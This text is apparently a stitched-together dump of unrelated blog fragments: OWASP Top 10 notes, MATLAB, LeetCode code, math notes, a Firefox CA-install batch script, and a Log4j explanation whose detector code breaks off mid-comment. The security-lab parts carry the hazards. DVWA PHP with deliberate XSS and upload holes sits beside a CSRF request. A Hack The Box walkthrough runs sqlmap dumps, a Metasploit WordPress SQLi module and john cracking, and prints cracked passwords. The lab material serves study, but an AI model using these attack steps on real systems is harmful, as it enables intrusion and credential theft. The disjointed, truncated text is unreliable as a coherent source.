The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
Injection
Broken Authentication
Sensitive Data Exposure
XML External Entities (XXE)
Broken Access Control
Security Misconfiguration
Cross-Site Scripting (XSS)
Insecure Deserialization
Using Components with Known Vulnerabilities
Insufficient Logging and Monitoring
Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
Broken Authentication. Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
Sensitive Data Exposure. Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
XML External Entities (XXE). Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
Broken Access Control. Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.
Security Misconfiguration. Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
%% extract watermark
FA2 = fft2(FAO);                 % spectrum of the watermarked image
G = (FA2 - FA) / alpha;          % difference from the original spectrum, scaled back by the embedding strength
GG = G;
% undo the random row/column permutation used at embedding time
for i = 1:imsize(1)*0.5
    for j = 1:imsize(2)
        GG(M(i), N(j), :) = G(i, j, :);
    end
end
% restore the conjugate-symmetric half of the spectrum
for i = 1:imsize(1)*0.5
    for j = 1:imsize(2)
        GG(imsize(1)+1-i, imsize(2)+1-j, :) = GG(i, j, :);
    end
end
figure, imshow(GG); title('extracted watermark');
% imwrite(uint8(GG), 'extracted watermark.jpg');
parser.add_argument("--square", help="display a square of a given number", type=int)
parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array that sum to zero.
Note that the solution set must not contain duplicate triplets.
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
It does not depend on a browser, so you can even run it on Node.js.
Any polynomial can be written as f(x) = q(x)g(x) + r(x), where r(x) is called the remainder: r(x) = f(x) mod g(x).

If there is no remainder, g(x) is said to divide f(x), written g(x) | f(x).

If f(x) has no factors other than itself and 1, f(x) is called an irreducible polynomial (also called a reduced or prime polynomial).

Polynomials with coefficients in GF(p), taken modulo a prime polynomial, form a field.

Euclidean algorithm

a can be written as a = kb + r (a, b, k, r all positive integers, r < b), so r = a mod b. Suppose d is a common divisor of a and b, written d|a, d|b, i.e. both a and b are divisible by d. Since r = a - kb, dividing both sides by d gives r/d = a/d - kb/d = m; the right-hand side shows that m is an integer, so d|r. Hence d is also a common divisor of b and a mod b. Conversely, suppose d is a common divisor of b and a mod b; then d|b and d|(a - k*b) for an integer k, so d|a, and d is also a common divisor of a and b. Therefore (a, b) and (b, a mod b) have exactly the same common divisors, so their greatest common divisors must be equal. QED.

Any integer that divides both a and b must also divide a - b (and b), so if we take that integer to be gcd(a,b), it can be no larger than the greatest common divisor of a - b and b: gcd(a,b) <= gcd(a-b,b). Likewise, any integer that divides a - b and b must divide a and b, so taking it to be gcd(a-b,b), it can be no larger than the greatest common divisor of a and b: gcd(a-b,b) <= gcd(a,b). Hence gcd(a,b) = gcd(a-b,b). Since there is always an integer n such that a - n*b = a mod b, iterating gives gcd(a-b,b) = gcd(a-2b,b) = ... = gcd(a-n*b,b) = gcd(a mod b, b).
Recursive method:

from typing import List

class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        m = len(matrix)
        if m == 0 or len(matrix[0]) == 0:
            return []
        n = len(matrix[0])
        newlist = list(matrix[0])          # top row (copy, so the input is not mutated)
        if m > 1:
            for i in range(1, m):          # right column, top to bottom
                newlist.append(matrix[i][n-1])
            for j in range(n-2, -1, -1):   # bottom row, right to left
                newlist.append(matrix[m-1][j])
            if n > 1:
                for i in range(m-2, 0, -1):  # left column, bottom to top
                    newlist.append(matrix[i][0])
        # strip the outer ring and recurse on the inner sub-matrix
        M = []
        for k in range(1, m-1):
            t = matrix[k][1:-1]
            M.append(t)
        return newlist + self.spiralOrder(M)

Clearer method:

from typing import List

class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        res = []
        if len(matrix) == 0:
            return []
        # define the four boundaries
        left = 0
        right = len(matrix[0]) - 1
        top = 0
        bottom = len(matrix) - 1
        # walk one full ring per iteration while the boundaries have not crossed
        while top < bottom and left < right:
            for i in range(left, right):
                res.append(matrix[top][i])
            for i in range(top, bottom):
                res.append(matrix[i][right])
            for i in range(right, left, -1):
                res.append(matrix[bottom][i])
            for i in range(bottom, top, -1):
                res.append(matrix[i][left])
            left += 1
            top += 1
            right -= 1
            bottom -= 1
        # if a single row or a single column remains, collect it directly
        if top == bottom:
            for i in range(left, right + 1):
                res.append(matrix[top][i])
        elif left == right:
            for i in range(top, bottom + 1):
                res.append(matrix[i][left])
        return res
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

The Referer header is checked.

GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1
Host: 49.232.78.252:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Referer: http://49.232.78.252:81/vulnerabilities/csrf/
Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium
Upgrade-Insecure-Requests: 1
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
    ( $uploaded_size < 100000 ) ) {

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
else {
    // Invalid file
    echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
// Check CAPTCHA from 3rd party
$resp = recaptcha_check_answer(
    $_DVWA[ 'recaptcha_private_key'],
    $_POST['g-recaptcha-response']
);

// Did the CAPTCHA fail?
if( !$resp ) {
    // What happens when the CAPTCHA was entered incorrectly
    $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
    $hide_form = false;
    return;
}
else {
    // CAPTCHA was correct. Do both new passwords match?
    if( $pass_new == $pass_conf ) {
        // Show next stage for the user
        echo "
            <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
            <form action=\"#\" method=\"POST\">
                <input type=\"hidden\" name=\"step\" value=\"2\" />
                <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
                <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
                <input type=\"submit\" name=\"Change\" value=\"Change\" />
            </form>";
    }
    else {
        // Both new passwords do not match.
        $html     .= "<pre>Both passwords must match.</pre>";
        $hide_form = false;
    }
}
}
// Check to see if both password match
if( $pass_new == $pass_conf ) {
    // They do!
    $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_new = md5( $pass_new );

    // Feedback for the end user
    echo "<pre>Password Changed.</pre>";
}
else {
    // Issue with the passwords matching
    echo "<pre>Passwords did not match.</pre>";
    $hide_form = false;
}
?>
<?php
if (isset ($_POST['include'])) {
    $page[ 'body' ] .= "
        " . $_POST['include'] . "
    ";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';
SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
Blind SQL and Blind OS Command injection
Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
Cross-Site Request Forgery (CSRF)
AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
Malicious, unrestricted file uploads and backdoor files
Authentication, authorization and session management issues
Arbitrary file access and directory traversals
Local and remote file inclusions (LFI/RFI)
Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...
HTTP parameter pollution and HTTP response splitting
Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
Unvalidated redirects and forwards, and cookie poisoning
Cookie poisoning and insecure cryptographic storage
Server Side Request Forgery (SSRF)
XML External Entity attacks (XXE)
And much much much more…
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H
-A              Add a certificate to the database (create if needed)
-E              Add an Email certificate to the database (create if needed)
   -n cert-name         Specify the nickname of the certificate to add
   -t trustargs         Set the certificate trust attributes:
                           p    valid peer
                           P    trusted peer (implies p)
                           c    valid CA
                           T    trusted CA to issue client certs (implies c)
                           C    trusted CA to issue server certs (implies c)
                           u    user cert
                           w    send warning
                           g    make step-up cert
   -f pwfile            Specify the password file
   -d certdir           Cert database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix
   -a                   The input certificate is encoded in ASCII (RFC1113)
   -i input             Specify the certificate file (default is stdin)

-C              Create a new binary certificate from a BINARY cert request
   -c issuer-name       The nickname of the issuer cert
   -i cert-request      The BINARY certificate request file
   -o output-cert       Output binary cert to this file (default is stdout)
   -x                   Self sign
   -m serial-number     Cert serial number
   -w warp-months       Time Warp
   -v months-valid      Months valid (default is 3)
   -f pwfile            Specify the password file
   -d certdir           Cert database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix
   -1                   Create key usage extension
   -2                   Create basic constraint extension
   -3                   Create authority key ID extension
   -4                   Create crl distribution point extension
   -5                   Create netscape cert type extension
   -6                   Create extended key usage extension
   -7                   Create an email subject alt name extension
   -8                   Create an dns subject alt name extension

-G              Generate a new key pair
   -h token-name        Name of token in which to generate key (default is internal)
   -k key-type          Type of key pair to generate ("dsa", "rsa" (default))
   -g key-size          Key size in bits, (min 512, max 2048, default 1024)
   -y exp               Set the public exponent value (3, 17, 65537) (rsa only)
   -f password-file     Specify the password file
   -z noisefile         Specify the noise file to be used
   -q pqgfile           read PQG value from pqgfile (dsa only)
   -d keydir            Key database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix

-D              Delete a certificate from the database
   -n cert-name         The nickname of the cert to delete
   -d certdir           Cert database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix

-U              List all modules
   -d moddir            Module database directory (default is '~/.netscape')
   -P dbprefix          Cert & Key database prefix
   -X                   force the database to open R/W

-K              List all keys
   -h token-name        Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens)
   -k key-type          Type of key pair to list ("all", "dsa", "rsa" (default))
   -f password-file     Specify the password file
   -d keydir            Key database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix
   -X                   force the database to open R/W

-L              List all certs, or print out a single named cert
   -n cert-name         Pretty print named cert (list all if unspecified)
   -d certdir           Cert database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix
   -X                   force the database to open R/W
   -r                   For single cert, print binary DER encoding
   -a                   For single cert, print ASCII encoding (RFC1113)

-M              Modify trust attributes of certificate
   -n cert-name         The nickname of the cert to modify
   -t trustargs         Set the certificate trust attributes (see -A above)
   -d certdir           Cert database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix

-N              Create a new certificate database
   -d certdir           Cert database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix

-T              Reset the Key database or token
   -d certdir           Cert database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix
   -h token-name        Token to reset (default is internal)

-O              Print the chain of a certificate
   -n cert-name         The nickname of the cert to modify
   -d certdir           Cert database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix
   -X                   force the database to open R/W

-R              Generate a certificate request (stdout)
   -s subject           Specify the subject name (using RFC1485)
   -o output-req        Output the cert request to this file
   -k key-type          Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name        Name of token in which to generate key (default is internal)
   -g key-size          Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile           Name of file containing PQG parameters (dsa only)
   -f pwfile            Specify the password file
   -d keydir            Key database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix
   -p phone             Specify the contact phone number ("123-456-7890")
   -a                   Output the cert request in ASCII (RFC1113); default is binary

-V              Validate a certificate
   -n cert-name         The nickname of the cert to Validate
   -b time              validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]")
   -e                   Check certificate signature
   -u certusage         Specify certificate usage:
                           C    SSL Client
                           V    SSL Server
                           S    Email signer
                           R    Email Recipient
   -d certdir           Cert database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix
   -X                   force the database to open R/W

-S              Make a certificate and add to database
   -n key-name          Specify the nickname of the cert
   -s subject           Specify the subject name (using RFC1485)
   -c issuer-name       The nickname of the issuer cert
   -t trustargs         Set the certificate trust attributes (see -A above)
   -k key-type          Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name        Name of token in which to generate key (default is internal)
   -g key-size          Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile           Name of file containing PQG parameters (dsa only)
   -x                   Self sign
   -m serial-number     Cert serial number
   -w warp-months       Time Warp
   -v months-valid      Months valid (default is 3)
   -f pwfile            Specify the password file
   -d certdir           Cert database directory (default is ~/.netscape)
   -P dbprefix          Cert & Key database prefix
   -p phone             Specify the contact phone number ("123-456-7890")
   -1                   Create key usage extension
   -2                   Create basic constraint extension
   -3                   Create authority key ID extension
   -4                   Create crl distribution point extension
   -5                   Create netscape cert type extension
   -6                   Create extended key usage extension
   -7                   Create an email subject alt name extension
   -8                   Create an dns subject alt name extension
@echo off
:: Enable delayed variable expansion
setlocal EnableExtensions EnableDelayedExpansion

echo ###checking new_version###
echo --------------------------
set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"
set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"
set regKey="CurrentVersion"
set regValue=""

set Value1="checkversion"

rem Check whether the new-version registry key exists
reg query %regPath1% >nul 2>nul
echo %errorlevel%
echo !errorlevel!
if %errorlevel%==0 (
    echo new_version Registry key %regkey% exists.
    for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (
        if "%regValue%"=="" (
            echo value not exists
        ) else (
            set Value1=%%b
        )
    )
) else (
    echo new_version Registry key %regkey% does not exist.
    echo --------------------------
    rem Check whether the old-version registry path exists (rem, not ::, inside a parenthesised block)
    echo ###checking old_version###
    reg query %regPath2% >nul 2>nul
    if !errorlevel!==0 (
        echo old_version Registry key %regkey% exists.
        for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (
            if "%regValue%"=="" (
                echo value not exists
            ) else (
                set Value1=%%b
            )
        )
    ) else (
        echo old_version Registry key %regkey% does not exist.
        set Value1=0.0.0
    )

    echo !Value1!
    echo %Value1%

    set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
    echo Majorold: %Major%
)

echo !Value1!
echo %Value1%

rem Split "Major.Minor.Revision.Subrev" into separate variables
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
echo Majornew: %Major%

rem Check the version number (the original compared an undefined %final_version%; %Major% is the value actually set above)
if %Major% EQU 0 (
    echo Program version is 0. Exiting script...
    exit /b 1
) else if %Major% LSS 49 (
    call :function1
) else (
    call :function2
)

rem Exit the script
exit /b

::
:function1
echo Program version is less than 49. Executing function 1...
rem Function 1: for Firefox versions below 49, update the cert8.db certificate store.

:: Show the existing certificates in the db
set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"
set default_name=""
:: Check whether the certificate database path exists
IF EXIST %db_path% (
    echo default_path exists
    rem Add the commands to run here
    set "count=0"
    for /d %%i in ("%db_path%\*") do (
        set /a count+=1
        set "folder=%%~nxi"
    )
    rem Check whether *.default is the only folder
    if !count! equ 1 (
        set default_name=!folder!
        set "all_path=%db_path%!default_name!"
        rem Show the full path of the default folder
        echo !all_path!
        rem Show the certificate store before the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
        rem Update the certificate store
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path!
        rem Show the certificate store after the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
    ) else (
        echo no or more
    )
) ELSE (
    echo no
)
goto :eof

:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem Function 2: for Firefox 49 and above, enable security.enterprise_roots.enabled

set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg
set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg%" (
        copy "%source_file_cfg%" "%dest_dir_cfg%"
    ) else (
        echo Directory %dest_dir_cfg% does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg_x86%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg_x86%" (
        copy "%source_file_cfg%" "%dest_dir_cfg_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set source_file_js=C:\firefoxinstallcert\local-settings.js
set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js%" (
        copy "%source_file_js%" "%dest_dir_js%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)

set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js_x86%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js_x86%" (
        copy "%source_file_js%" "%dest_dir_js_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)
Variant of :function2 (same script header, version check and :function1 as above), which enables security.enterprise_roots.enabled on Firefox 49 and above by copying a user.js file into the profile directory:

:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem Function 2: for Firefox 49 and above, enable security.enterprise_roots.enabled by adding a user.js configuration file

:: Default profiles directory
set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles"
:: Look for the folder whose name contains "default", i.e. the profile folder
set "searchString=default"
set source_user_js=C:\firefoxinstallcert\user.js
:: Copy the user.js file into the profile directory

IF EXIST %parentFolder% (
    for /d %%F in ("%parentFolder%\*") do (
        echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1
        if errorlevel 1 (
            echo default Folder not found.
        ) else (
            echo default Folder found.
            rem Build the full path
            set "all_default_path=%parentFolder%\%%~nxF"
            echo !all_default_path!
            copy "%source_user_js%" !all_default_path!
        )
    )
) ELSE (
    echo no
)
goto :eof
pause
COMMANDS:
   webscan, ws        Run a webscan task
   servicescan, ss    Run a service scan task
   subdomain, sd      Run a subdomain task
   poclint, pl, lint  lint yaml poc
   burp-gamma, btg    Convert the export file of burp historical proxy records to POC format
   transform          transform other script to gamma
   reverse            Run a standalone reverse server
   convert            convert results from json to html or from html to json
   genca              GenerateToFile CA certificate and key
   upgrade            check new version and upgrade self if any updates found
   version            Show version info
   x                  A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file.
   help, h            Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --config FILE      Load configuration from FILE (default: "config.yaml")
   --log-level value  Log level, choices are debug, info, warn, error, fatal
   --help, -h         show help

[INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml

OPTIONS:
   --list, -l                                   list plugins
   --plugins value, --plugin value, --plug value  specify the plugins to run, separated by ','
   --poc value, -p value                        specify the poc to run, separated by ','
   --level value                                specify the level of poc to run, separated by ','
   --tags value                                 specify the level of poc to run, separated by ','

   --listen value                               use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111)
   --basic-crawler value, --basic value         use a basic spider to crawl the target and scan the requests
   --browser-crawler value, --browser value     use a browser spider to crawl the target and scan the requests
   --url-file value, --uf value                 read urls from a local file and scan these urls, one url per line
   --burp-file value, --bf value                read requests from burpsuite exported file as targets
   --url value, -u value                        scan a **single** url
   --data value, -d value                       data string to be sent through POST (e.g. 'username=admin')
   --raw-request FILE, --rr FILE                load http raw request from a FILE
   --force-ssl, --fs                            force usage of SSL/HTTPS for raw-request

   --json-output FILE, --jo FILE                output xray results to FILE in json format
   --html-output FILE, --ho FILE                output xray result to FILE in HTML format
   --webhook-output value, --wo value           post xray result to url in json format
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml
Enabled plugins: [phantasm]
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)
[INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/
[Vuln: phantasm]
Target           "http://example.com/"
VulnType         "poc-yaml-jumpserver-session-replay-unauth/default"
Author           "Chaitin"
Links            ["https://stack.chaitin.com/techblog/detail/156"]

[*] All pending requests have been scanned
[*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00%
[INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─# nmap -sV $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining)
Nmap scan report for 10.129.231.241
Host is up (0.0093s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
If we browse to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain to /etc/hosts.
[15:30:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.24, Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:30:38] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema

[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'

[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv'
[15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
   #  Name                                                     Disclosure Date  Rank    Check  Description
   -  ----                                                     ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_bookingpress_category_services_sqli  2022-02-28       normal  Yes    Wordpress BookingPress bookingpress_front_get_category_services SQLi

Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli

msf6 > use 0
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb
RHOST => metapress.htb
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/
TARGETURI => /events/
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 10.129.231.241

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
Wordpress User Credentials
==========================
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
partylikearockstar (manager)

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# ftp metapress.htb@$IP
Connected to 10.129.231.241.
220 ProFTPD Server (Debian) [::ffff:10.129.231.241]
331 Password required for metapress.htb
Password:
230 User metapress.htb logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash. Running john then reported an error:

Crash recovery file is locked: /root/.john/john.rec

Fix:

rm /root/.john/john.rec

Start cracking:

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182         (Passpie)
1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.
```mermaid
graph LR
    A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?}
    C -->|Yes| D[Execute<br>JNDI lookup]
    C -->|No| E[Normal log]
    D --> F[Connect to<br>attacker's server]
    F --> G[Download &<br>execute<br>malicious codes]
    G --> H[Attacker gains<br>server control]
```
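As an added example (not part of the original post), a small Python log-triage scanner for the lookup pattern in the diagram above: Log4j resolves `${...}` lookups from the inside out, so a detector that only greps for the literal string `${jndi:` misses payloads whose prefix is assembled from nested `${lower:..}`, `${upper:..}` or `${:-..}` lookups. The scanner normalises those first and then checks for the JNDI prefix; the log lines and the placeholder host are constructed.

```python
import re

# Constructed sample access-log lines (not from the page). Line 0 is benign;
# lines 1-4 carry the ${jndi:...} lookup that CVE-2021-44228 turns into an
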